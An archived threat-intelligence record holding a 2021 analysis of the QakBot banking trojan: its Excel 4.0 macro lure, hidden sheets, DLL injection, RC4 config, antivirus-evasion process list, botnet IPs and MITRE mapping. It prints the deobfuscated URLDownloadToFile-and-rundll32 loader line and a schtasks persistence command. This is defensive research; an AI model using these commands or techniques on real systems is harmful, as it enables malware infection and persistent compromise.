{
	"id": "3f1b1018-646e-4bd1-932f-32f3b89a6e6e",
	"created_at": "2026-04-06T00:15:58.079391Z",
	"updated_at": "2026-04-10T13:12:17.727396Z",
	"deleted_at": null,
	"sha1_hash": "9555a90b4751d027ff483dca4a4f82b37ea2a012",
	"title": "A taste of the latest release of QakBot",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5901708,
	"plain_text": "A taste of the latest release of QakBot\r\nBy Pierluigi Paganini\r\nPublished: 2021-05-06 · Archived: 2026-04-02 12:21:58 UTC\r\nA taste of the latest release of QakBot – one of the most popular and widely reported banking trojans active since 2007.\r\nThe malware QakBot, also known as Qbot, Pinkslipbot, and Quakbot, is a banking trojan that has been making headlines since 2007. This piece of malware is focused on stealing banking credentials and victims’ secrets using different tactics, techniques and procedures (TTPs) which have evolved over the years, including its delivery mechanisms, C2 techniques, and anti-analysis and anti-reversing features.\r\nEmotet was known as the most popular threat distributing QakBot in the wild; nonetheless, Emotet has been taken down recently, and QakBot operators are using specially targeted campaigns to disseminate this threat around the globe. Figure 1 shows two email templates distributing QakBot in Portugal in early May 2021.\r\nFigure 1: Email template of QakBot malware targeting Portuguese Internet end users – May 2021.\r\nh/t @MiguelSantareno – malware submitted on 0xSI_f33d\r\nAdditionally, QakBot is able to move laterally in the internal environment to steal sensitive data, establish internal persistence, or even deploy other final payloads like ransomware. Recent reports show it being used to drop other malware such as the ProLock and Egregor ransomware. At the moment, after the Emotet takedown, QakBot is becoming one of the most prominent and observed threats allowing criminals to gain a foothold on internal networks. In the next workflow, we can learn how the QakBot infection chain works.\r\nhttps://securityaffairs.co/wordpress/117558/cyber-crime/qakbot-latest-release.html\r\nPage 1 of 13\r\nFigure 2: High-level diagram of QakBot malware and its capabilities.\r\nQakBot is disseminated these days using targeted phishing campaigns in several languages, including Portuguese. The infection chain starts with a URL in the email body that downloads a zip archive containing an XLM or XLSM file (Excel) that takes advantage of Excel 4.0 (XLM) macros to download the 2nd stage from compromised web servers.\r\nThe 2nd stage – in the form of a DLL with a random extension – is loaded into memory using the DLL injection technique via the rundll32.exe Windows utility. After that, the final payload (QakBot itself) is loaded in memory and the malicious activity is initiated. The malware is equipped with a list of hardcoded IP addresses from its botnet, and it receives commands and updates from the C2 server, including the deployment of additional payloads like ransomware.\r\nDribbling AVs with XLM macros\r\nThe malicious Office document, when opened, poses as a DocuSign file – a popular software for signing digital documents. The malicious documents take advantage of Excel 4.0 macros (XLM macros) stored in hidden sheets that download the QakBot 2nd stage payload from the Internet – malicious servers compromised by criminals. Then, the DLL is written to disk and executed using the DLL injection technique via the regsvr32 or rundll32 utilities.\r\nFigure 3: Excel document used to lure victims and download and execute the QakBot 2nd stage.\r\nAccording to a publication by ReversingLabs, “among 160,000 Excel 4.0 documents, more than 90% were classified by TitaniumCloud as malicious or suspicious“.\r\n(…) if you encounter a document that contains XLM macros, it is almost certain that its macro will be malicious, RL concluded.\r\nSample Classification | Count | Percentage\r\nGoodware | 14458 | 9.1%\r\nSuspicious | 738 | 0.5%\r\nMalicious | 144052 | 90.4%\r\nTotal | 159248 | 100%\r\nTable 1: Classification and distribution of documents containing XLM macros (source).\r\nThe malware families detected in the sample set by RL show that ZLoader and Quakbot are the dominant malware families in the Excel 4.0 malware ecosystem.\r\nFigure 4: Malware family distribution using XLM macros in the wild (source).\r\nXLSM file – QakBot loader\r\nFilename: catalog-1712981442.xlsm\r\nMD5: f86c6670822acb89df1eddb582cf0e90\r\nCreation time: 2021-04-29 22:18:33\r\nAn XLSM file is a macro-enabled spreadsheet created by Microsoft Excel, a widely used spreadsheet program included in the Microsoft Office suite. These kinds of files contain worksheets of cells arranged by rows and columns as well as embedded macros.\r\nThe compressed Microsoft Excel filenames appear to follow a naming convention beginning with document- or catalog-, followed by several digits and the .xlsm or .xls extension, for example, catalog-1712981442.xlsm.\r\nInitially, the Excel document prompts the victim to enable macros to start the infection chain. In detail, the Excel spreadsheet contains hidden sheets – Excel 4.0 macros, spreadsheet formulas, and BIFF records – all with the goal of passing a casual visual inspection by the end user and by malware analysts.\r\nFigure 5: Only the first sheet appears when the XLSM file is opened, in order to hide the malicious content from the eyes of malware researchers.\r\nLooking at the internal XML files that are part of the Excel XLSM file, we can easily identify that other sheets exist hidden inside the document, as highlighted in Figure 6.\r\nFigure 6: Discovering other hidden sheets inside the internal structure of the malicious XLSM doc file.\r\nFrom the content highlighted above, we can see the names “Sheet1“, “Sheet2“, “Sheet3” and “Sheet4” as the total of sheets available in the document, and also that “Sheet2” will trigger something when the document is opened, via the “xlnm.Auto_Open” feature.\r\nIn short, this type of malicious document will usually have a cell defined as the “Auto_Open cell”, and its functionality is very similar to the “Sub AutoOpen()” function in VBA: it automatically runs macros when the victim presses the “Enable Content” button at the start.\r\nJust as a way to confirm we are facing a malicious document, we investigated the internal file sharedStrings.xml – which usually contains interesting content such as hardcoded strings, URLs, and so on.\r\nBingo!\r\nFigure 7: Hardcoded URLs used to download the QakBot 2nd stage via the URLDownloadToFile call and execute it using rundll32.\r\nFrom this point, we know that the 2nd stage will be downloaded from the previous URLs using the URLDownloadToFile call, but some content seems a bit obfuscated. This is the interesting part that makes XLM macros a potent initial stage to start malware infection chains.\r\nDigging into the details, we can observe that several combinations and operations on document cells are performed to concatenate the final string that will execute the QakBot DLL (2nd stage) in memory.\r\nFigure 8: Malicious code responsible for starting the QakBot 2nd stage, spread across several hidden sheets.\r\nPart of the strings extracted from the malicious Excel file are presented below:\r\nauto_open: auto_open->Sheet2!$AO$115 SHEET: Sheet2, Macrosheet CELL:AO134 , =SET.VALUE(AY120,AV131&AV132&A\r\nIn order to understand the details and reveal the clear source code, we need to learn about the BIFF8 format. Some details and workarounds were also shared in an old campaign involving the FlawedAmmyy malware here.\r\nAccording to the XLM specification by Microsoft available here, all the information about the sheet, including its name, type, and stream position, is kept within a BOUNDSHEET record (85h). Figure 9 shows how a sheet type is defined and the possible hidden status flags:\r\n00h: visible\r\n01h: hidden\r\n02h: very hidden\r\nFigure 9: BIFF format and BOUNDSHEET information (85h), including sheet type and its possible status.\r\nBy analyzing the XLSM document, we can see in Figure 10 that only the first BOUNDSHEET (0x09 0xF0 0x00 0x00) has the hidden status set to visible – 0x00. The other BOUNDSHEETs are defined as very hidden using the hex value 0x02.\r\nFigure 10: Internal details about the malicious BOUNDSHEETs and hidden states.\r\nDigging into the details, four BOUNDSHEET records means that the document has four sheets, but three of them are very hidden. Using a common hex editor, we can change the values and fix the target XLSM file as depicted in Figure 11.\r\nFigure 11: Patching the XLSM malicious file to unhide all the sheets.\r\nAs highlighted above, the values of the last bytes 0x02 and 0x01 were changed to 0x00 and 0x00 on the BOUNDSHEET related to Sheet2. The same process was done for the other BOUNDSHEETs. By opening the malicious file again, we can now see that all the sheets are available, and also navigate through the source code spread over random cells.\r\nFigure 12: Source code available on the revealed sheets.\r\nDuring the code analysis, we found that criminals used another trick to make the analysis task harder. To prevent a casual visual inspection of these values, the font color was set to white. So, before analyzing the cells, we need to change the document background color or the font color.\r\nBy deobfuscating the formulas and reassembling the strings back to their original form, we can learn how the malicious chain starts:\r\nThe loader uses a VBA CALL statement to access the URLDownloadToFile function from URLMon.dll to download the 1st stage DLL from the hardcoded URLs to the local path (..\\\\) using a random name for the file: jordji.nbvt11.\r\nNext, the DLL is loaded into memory using the DLL injection technique via the rundll32.exe Windows utility, allowing code to be executed.\r\nCALL(URLMon,URLDownloadToFileA,JJCCBB,0,hxxps://dentistelmhurstny.]com/…,..\\\\jordji.nbvt11,0)\r\nEXEC(“rundll32 ..\\jordji.nbvt11,DllRegisterServer”)\r\nQakBot 2nd stage – the bait loader\r\nFilename: jordji.nbvt11\r\nOriginal filename: rwenc.dll\r\nMD5: 7d0f6c345cdaf9e290551b220d53cd14\r\nCreation time: 2021-04-13 19:53:55\r\nThe QakBot 2nd stage is a DLL loaded in memory and its principal missions are:\r\nExecute in memory the last payload (QakBot itself)\r\nMake the malware analysis harder: it looks like a legitimate file and adds confusion with unused libraries, calls, and so on.\r\nAt first glance, this DLL seems very simple, with just a few calls present in the Import Address Table (IAT). Nonetheless, something caught our eye: the triple chain LoadLibraryA, VirtualAlloc, and VirtualProtect. No doubt, we are facing a DLL injection technique and another payload is going to be executed in memory.\r\nFigure 13: QakBot 2nd stage, its import table (IAT), and the well-known calls used in the DLL injection technique.\r\nGotcha!\r\nFigure 14: QakBot final stage dumped from memory.\r\nThe art of confusion … playing with bins\r\nIn another sample we analyzed (9b1a02189e9bdf9af2f026d8409c94f7), the process of injecting the last payload into memory is very similar, but the loader was developed in Delphi – a clear sign that criminals are adding additional layers, resources, and features to make QakBot identification and its analysis/detection harder.\r\nFigure 15: Identification of Delphi forms and unknown resources (encrypted QakBot DLL).\r\nCriminals use multiple loaders like this one, built in the Delphi language with a lot of junk, GUI forms, and native Delphi functions, as a way of deceiving threat detection systems and hiding the last payload from the tentacles of malware analysts.\r\nFigure 16: A lot of Delphi native functions and forms to make malware detection harder.\r\nThe art of confusion is not new, and several trojans are using this kind of approach in their operations, such as Javali, Grandoreiro, and URSA, all of them banking trojans that come from Latin American countries.\r\nTaking a look at the code, we can find that once again the LoadLibrary call is used to execute the last QakBot payload in memory. Figure 17 highlights the parts of the code responsible for loading the final payload.\r\nFigure 17: DLL injection technique used to load the last QakBot payload into memory.\r\nWe got it!\r\nFigure 18: Dumping from memory the last stage of QakBot malware.\r\nThere is no doubt, it is the same payload just compiled on a different date (another release).\r\nFigure 19: PE information about the QakBot last stage (stager_1.dll).\r\nQakBot last stage – The beast\r\nThe last stage of this chain – QakBot itself – is also a DLL built with Microsoft Visual C++; the original name is stager_1.dll, and it exports only one function: DllRegisterServer. The easy way to identify the last release of the QakBot DLL is to look at the two resources named “118” (C2 list) and “524” (bot config), encrypted using the RC4 algorithm.\r\nFigure 20: Resource names found in the last release of the QakBot DLL.\r\nAn interesting detail regarding this new release is that QakBot tries to decrypt the configuration as usual. Initially, it takes the first 20 bytes of the resource and uses them as the RC4 key. After that, it takes 20 bytes from the decrypted blob and uses them as a SHA1 verification for the rest of the decrypted data.\r\nThe fresh method starts here. Every time the SHA1 validation fails, QakBot tries the new decryption method. In sum, it uses the SHA1 of the PowerShell path hardcoded inside the binary as an RC4 key. This new approach involves the new campaigns biden, clinton, and tr, and was introduced in the 401 major version.\r\n\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nSome samples of the QakBot trojan are signed PE files with a valid signature issued by several CAs. For example, we can see this sample (cd1ab264088207f759e97305d8bf847d) is signed by Sectigo – a well-known CA also abused by developers of other kinds of threats in the past.\r\nA popular technique used by criminals to complicate analysis and waste the reverse engineer’s time is junk code insertion. In this sense, QakBot is no exception. The malware author added a lot of API calls that alternate with the real instructions – to increase the time the analysis consumes and cause disturbances when the malware executes in a sandbox environment.\r\nAnother interesting detail is that the developers of QakBot added a non-standard calling convention that makes it difficult to understand and recognize the real parameters passed to the functions. The common standard calling conventions are cdecl, stdcall, thiscall or fastcall.\r\nThe strings inside QakBot are encrypted, decrypted at run-time, and destroyed after use (like the widely reported Emotet). Some of the strings hardcoded inside the DLL are presented below.\r\nAs observed below, the strings are encrypted and stored in a continuous blob. The decryption function accepts one argument, the index of the string, and then XORs it with a hardcoded byte array.\r\nAfter this point, some strings will be decrypted at run-time, and so will the API functions, via a pre-computed hash of the API function names that resolves calls dynamically. More details about this can be found in this great article by the VinCSS blog.\r\nIt is also important to highlight some anti-debugging and protection mechanisms used by this piece of malware. As stated by the VinCSS analysis, “if the victim machine uses Kaspersky protection (avp.exe process), QakBot will inject code into mobsync.exe instead of explorer.exe.“. We can find more details and target processes in Figure 27 below.\r\nThe full list of target processes can be found below:\r\nccSvcHst.exe\r\navgcsrvx.exe\r\navgsvcx.exe\r\navgcsrva.exe\r\nMsMpEng.exe\r\nmcshield.exe\r\navp.exe\r\nkavtray.exe\r\negui.exe\r\nekrn.exe\r\nbdagen\r\nDuring this analysis, QakBot injected a new payload into the target process “explorer.exe” and then a scheduled task was created as a persistence mechanism using the schtasks.exe Windows utility.\r\n”C:\\Windows\\system32\\schtasks.exe” /Create /RU “NT AUTHORITY\\SYSTEM” /tn vcjscfpqk /tr “regsvr32.exe -s \\”C:\\Users\\Admin\\AppData\\Local\\Temp\\k.exe.dll\\”” /SC ONCE /Z /ST 01:34 /ET 01:46\r\nFigure 28: Process flow of the QakBot execution.\r\nIn addition, the QakBot DLL will be loaded every time using the Register Server utility, regsvr32.exe, with the following parameters:\r\n/Create: schedules a new task\r\n/RU “NT AUTHORITY\\\\SYSTEM”: executes the task with elevated system privileges\r\n/tn <RANDOM_STRING>: specifies the task name, seemingly using a random string\r\n/tr “regsvr32.exe -s \\\\”<PAYLOAD>”: the process to be executed; in this case, regsvr32 is passed a malicious dynamic link library (DLL)\r\n/SC ONCE: task scheduled to execute once at the specified time\r\n/Z: delete the task upon completion of the schedule\r\n/ST <Now + 3 minutes as hh:mm>: start time, used by the ONCE schedule; and\r\n/ET <Now + 15 minutes as hh:mm>: end time, used by the ONCE schedule.\r\nBotnet hardcoded IP Addresses\r\nCampaign: 1618935072\r\nBotnet: tr\r\nVersion: 402.12\r\nURL tria.ge: https://tria.ge/210502-aek3yedsfj\r\nBotnet full list:\r\n140.82.49.12:443\r\n190.85.91.154:443\r\n96.37.113.36:993\r\n71.41.184.10:3389\r\n186.31.46.121:443\r\n73.25.124.140:2222\r\n109.12.111.14:443\r\n24.229.150.54:995\r\n4\r\nBotnet and campaign identifiers\r\nThe following botnet and campaign identifiers have been observed in the last weeks (since March 2021), with those behind Qakbot recently using US President names:\r\nabc025 – 1603896786\r\nbiden01 – 1613753447\r\nbiden02 – 1614254614\r\nbiden03 – 1614851222\r\nbiden09 – 1614939927\r\nobama07 – 1614243368\r\nobama08 – 1614855149\r\nobama09 – 1614939797\r\ntr – 1614598087\r\ntr – 1618935072\r\nMitre Att&ck Matrix\r\nTactic | ID | Name | Description\r\nDefense Evasion | T1027 | Obfuscated Files or Information | QakBot XLM files are obfuscated and sheets are hidden.\r\nDefense Evasion | T1027.002 | Obfuscated Files or Information: Software Packing | Every binary and config is obfuscated and encrypted using the RC4 cipher.\r\nExecution, Persistence, Privilege Escalation | T1053 | Scheduled Task/Job | QakBot creates tasks to maintain persistence.\r\nExecution, Persistence, Privilege Escalation | T1053.005 | Scheduled Task/Job: Scheduled Task | QakBot uses this TTP as a way of executing the malicious DLL every time.\r\nDefense Evasion, Privilege Escalation | T1055 | Process Injection | QakBot uses Process Injection to load some payloads into memory.\r\nDefense Evasion, Privilege Escalation | T1055.001 | Process Injection: Dynamic-link Library Injection | DLL injection is used to load QakBot via the rundll32 Windows utility.\r\nCollection, Credential Access | T1056 | Input Capture | QakBot collects credentials and sensitive data from the victim’s devices.\r\nDiscovery | T1057 | Process Discovery | QakBot performs process discovery.\r\nDiscovery | T1082 | System Information Discovery | QakBot obtains the list of processes and other details.\r\nDiscovery, Defense Evasion | T1497 | Virtualization/Sandbox Evasion | Anti-VM and sandbox techniques are used to evade detection.\r\nDiscovery, Defense Evasion | T1497.003 | Virtualization/Sandbox Evasion: Time Based Evasion | Time-based evasion is checked during the malware run time.\r\nDiscovery | T1518 | Software Discovery | A list of the installed software is obtained.\r\nDiscovery | T1518.001 | Software Discovery: Security Software Discovery | Installed AVs and other security software are obtained.\r\nFinal Thoughts\r\nQakBot is a sophisticated trojan designed to collect banking information from victims’ devices. This piece of malware is targeting mostly US organizations and it is equipped with a variety of evasion and info-stealing routines as well as worm-like functions to make it persistent. Recent reports show it being used to drop other malware such as the ProLock and Egregor ransomware.\r\nQakBot is a challenging threat with capabilities to avoid dynamic analysis in automatic sandboxes, with the delayed executions present in its dropper as well as other tricks. With this capability in place, interactive sandboxes, for instance, won’t extract IoCs and artifacts from the malware easily.\r\nLast but not least, thanks to all the guys who contributed to this analysis and are mentioned in the reference section below.\r\nAdditional details are available in the original analysis published by Pedro Tavares on his blog:\r\nhttps://seguranca-informatica.pt/a-taste-of-the-latest-release-of-qakbot/#.YJOjUrUzY2y\r\nAbout the author: Pedro Tavares\r\nPedro Tavares is a professional in the field of information security working as an Ethical Hacker/Pentester, Malware Researcher and also a Security Evangelist. He is also a founding member of CSIRT.UBI and Editor-in-Chief of the computer security blog seguranca-informatica.pt.\r\nPierluigi Paganini\r\n(SecurityAffairs – hacking, QakBot)\r\nSource: https://securityaffairs.co/wordpress/117558/cyber-crime/qakbot-latest-release.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://securityaffairs.co/wordpress/117558/cyber-crime/qakbot-latest-release.html"
	],
	"report_names": [
		"qakbot-latest-release.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434558,
	"ts_updated_at": 1775826737,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9555a90b4751d027ff483dca4a4f82b37ea2a012.pdf",
		"text": "https://archive.orkl.eu/9555a90b4751d027ff483dca4a4f82b37ea2a012.txt",
		"img": "https://archive.orkl.eu/9555a90b4751d027ff483dca4a4f82b37ea2a012.jpg"
	}
}